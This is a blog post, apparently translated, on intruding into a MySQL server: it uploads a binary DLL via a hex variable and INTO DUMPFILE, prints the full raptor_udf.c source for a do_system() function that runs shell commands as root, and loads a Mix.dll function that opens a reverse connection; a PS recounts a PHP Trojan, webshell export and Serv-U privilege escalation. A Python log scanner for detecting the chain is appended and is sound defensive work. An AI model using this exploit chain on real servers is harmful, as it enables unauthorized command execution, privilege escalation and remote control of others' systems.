Upload and execute files with MySQL

xiaoxiao, 2021-03-31

I had always thought that MySQL could only be used to export a WebShell, but a while ago I happened to come across an article about executing system commands on Windows with MySQL, so I went on to search for related articles.

Uploading a file uses the MySQL command "SELECT * FROM mix INTO DUMPFILE 'c://abc.dll';" (in my earlier notes I had only ever used "SELECT * FROM tablename INTO OUTFILE 'C://abc.txt'"); I had not thought of using it for binary files.

As for executing commands, that is done with MySQL's user-defined function (UDF) mechanism. Looking it up, a simple DLL that MySQL can load has the following format:

[code]
/*
 * $Id: raptor_udf.c,v 1.1 2004/12/04 14:44:39 raptor Exp $
 *
 * raptor_udf.c - dynamic library for do_system() mysql udf
 * Copyright (c) 2004 Marco Ivaldi
 *
 * This is an helper dynamic library for local privilege escalation through
 * MySQL run with root privileges (very bad idea!), tested on MySQL 4.0.17.
 * Code ripped from: http://www.ngssoftware.com/papers/HackproofingMySQL.pdf
 *
 * "MySQL provides a mechanism by which the default set of functions can be
 * expanded by means of custom written dynamic libraries containing User
 * Defined Functions, or UDFs" -- Hackproofing MySQL
 *
 * Usage:
 * $ id
 * uid=500(raptor) gid=500(raptor) groups=500(raptor)
 * $ gcc -g -c raptor_udf.c
 * $ gcc -g -shared -Wl,-soname,raptor_udf.so -o raptor_udf.so raptor_udf.o -lc
 * $ mysql -u root -p
 * Enter password:
 * [...]
 * mysql> use mysql;
 * mysql> create table foo(line blob);
 * mysql> insert into foo values(load_file('/home/raptor/raptor_udf.so'));
 * mysql> select * from foo into dumpfile '/usr/lib/raptor_udf.so';
 * mysql> create function do_system returns integer soname 'raptor_udf.so';
 * mysql> select * from mysql.func;
 * +-----------+-----+---------------+----------+
 * | name      | ret | dl            | type     |
 * +-----------+-----+---------------+----------+
 * | do_system |   2 | raptor_udf.so | function |
 * +-----------+-----+---------------+----------+
 * mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
 * mysql> \! sh
 * sh-2.05b$ cat /tmp/out
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
 * [...]
 */

#include <stdio.h>
#include <stdlib.h>

/* Result types MySQL uses to describe UDF arguments and return values */
enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};

/* Arguments passed to the UDF by the server */
typedef struct st_udf_args {
	unsigned int      arg_count;   // number of arguments
	enum Item_result *arg_type;    // pointer to item_result
	char            **args;        // pointer to arguments
	unsigned long    *lengths;     // length of string args
	char             *maybe_null;  // 1 for maybe_null args
} UDF_ARGS;

/* Per-call state the server hands to the UDF */
typedef struct st_udf_init {
	char          maybe_null;   // 1 if func can return NULL
	unsigned int  decimals;     // for real functions
	unsigned long max_length;   // for string functions
	char         *ptr;          // free ptr for func data
	char          const_item;   // 0 if result is constant
} UDF_INIT;

/* The UDF itself: runs its single string argument through system() */
int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
	if (args->arg_count != 1)
		return(0);

	system(args->args[0]);

	return(0);
}
[/code]

Oh, it's that simple. (Compiling under VC seems to be "cl / ld abc.c"; I am not familiar with VC, so no help there.)

However, according to what is said online, you have to create the binary table in the mysql database and export from there for it to succeed; it may not succeed from TEST.

But I exported it several times and the binary file still came out incomplete (some of it was garbled).

That was because I made a small mistake at the start: I used the mysql client to get to the mysql command prompt and pasted the DLL file in, but the paste was always truncated, so the file was never complete. This problem bothered me for a long time; even changing the buffer size of the Windows console window did not help, and even using FTERM through the mysql client under Linux also failed. In the end I realised how stupid I had been. In fact, MySQL has a feature for importing MySQL commands from a file, that is, I can use mysql -u root -h hostname -p

First, create a new file script.txt with the following content:

[code]
use mysql;
drop table if exists mix;
create table mix (data longblob);
set @a = 0x;   /* leave this open for now and wait for the file contents to be pasted in after 0x */
insert into mix values (@a);
select * from mix into dumpfile 'remote directory and file name; pay attention to escaping the path';
drop table mix;
[/code]

Second, use WinHex to open the file you want to upload, then Copy All -> Hex Values, and paste it after "set @a =". This becomes the definition of a variable @a whose value is the contents of that file.

Third, execute mysql -u root -h remote host -p

The steps for exporting and running the DLL are described at http://blog.donews.com/swap/archive/2005/12/10/652990.aspx

First, use the method above to export a mix.dll (you have to obtain Mix.dll yourself).

Second, run:

[code]
create function MixConnect returns string soname 'C://Mix.dll';   /* note: change the file path */
select MixConnect('127.0.0.1', '886');                             /* note: change the IP address and port of the reverse connection */
[/code]
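From the defender's side, the whole chain above (hex literal into a variable, INTO DUMPFILE to drop the binary, CREATE FUNCTION ... SONAME to load it) is visible in the MySQL general log. The following Python scanner is an added example, not part of the original post; it assumes the 5.7-style general log line layout "timestamp thread_id Query statement", and the log lines it runs on are constructed here.

```python
import re

# Statements from the post's procedure, matched case-insensitively per logged query.
PATTERNS = {
    "hex_blob_var":   re.compile(r"\bSET\s+@\w+\s*=\s*0x[0-9a-f]{64,}", re.I),
    "dumpfile_write": re.compile(r"\bINTO\s+DUMPFILE\s+'", re.I),
    "udf_create":     re.compile(r"\bCREATE\s+FUNCTION\s+\w+\s+RETURNS\s+\w+\s+SONAME\b", re.I),
    "load_file":      re.compile(r"\bLOAD_FILE\s*\(", re.I),
}

# General log line (assumed layout): "<timestamp> <thread_id> Query <statement>"
LOG_LINE = re.compile(r"^\S+\s+(\d+)\s+Query\s+(.*)$")


def scan_general_log(lines):
    """Return (thread_id, rule, statement prefix) for every suspicious statement."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a Query record (Connect, Quit, ...) or malformed
        tid, stmt = int(m.group(1)), m.group(2)
        for rule, pat in PATTERNS.items():
            if pat.search(stmt):
                hits.append((tid, rule, stmt[:60]))
    return hits


def udf_staging_sessions(hits):
    """Thread ids that both wrote a file with DUMPFILE and registered a UDF:
    the combination is the strong signal, either alone may be legitimate."""
    rules_by_tid = {}
    for tid, rule, _ in hits:
        rules_by_tid.setdefault(tid, set()).add(rule)
    return sorted(t for t, r in rules_by_tid.items()
                  if {"dumpfile_write", "udf_create"} <= r)


# Constructed sample log: thread 12 follows the post's procedure, 13 and 14 are benign.
SAMPLE_LOG = [
    "2021-03-31T08:00:01.000000Z\t   12 Query\tuse mysql",
    "2021-03-31T08:00:02.000000Z\t   12 Query\tcreate table mix (data longblob)",
    "2021-03-31T08:00:03.000000Z\t   12 Query\tset @a = 0x" + "41" * 100,
    "2021-03-31T08:00:04.000000Z\t   12 Query\tinsert into mix values (@a)",
    "2021-03-31T08:00:05.000000Z\t   12 Query\tselect * from mix into dumpfile 'C://Mix.dll'",
    "2021-03-31T08:00:06.000000Z\t   12 Query\tcreate function MixConnect returns string soname 'C://Mix.dll'",
    "2021-03-31T08:00:07.000000Z\t   13 Query\tselect name, price from products where id = 7",
    "2021-03-31T08:00:08.000000Z\t   14 Query\tselect * from orders into outfile '/tmp/orders.csv'",
]

if __name__ == "__main__":
    found = scan_general_log(SAMPLE_LOG)
    for tid, rule, stmt in found:
        print(f"thread {tid}: {rule}: {stmt}")
    print("UDF staging sessions:", udf_staging_sessions(found))
```

Note that INTO OUTFILE (thread 14) is deliberately not flagged by the dumpfile rule: only DUMPFILE writes raw bytes, which is exactly why the post uses it for a DLL.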

PS: Originally, uploading a WebShell should not have needed all this trouble, but on the test target host the web user had no permissions: the file-upload code did not work, and although a one-line PHP Trojan was there, it could not actually be executed, because the original PHP file-upload function was unavailable (I estimate the administrator changed the permissions without setting things up properly, so after an upload lands in the temporary directory there is no permission to write the file back to the web directory). Directly exporting another small Trojan also seems to go wrong as soon as it hits a Chinese character, a single quote or a "/" escape character, so the exported Trojan cannot be executed. It was hard to export a Serv-U local privilege-escalation PHP file; it seemed to execute, but had no effect. Later I estimated that it had been altered when it was exported. The web user cannot write, but the Serv-U privilege escalation went very smoothly. In the end I learned something about MySQL intrusion. But I still cannot understand why this code can only Dir C:, while DIR C:/INETPUB does not work, even though there actually is permission to read it.

Please credit the original source when reposting: https://www.9cbs.com/read-130921.html
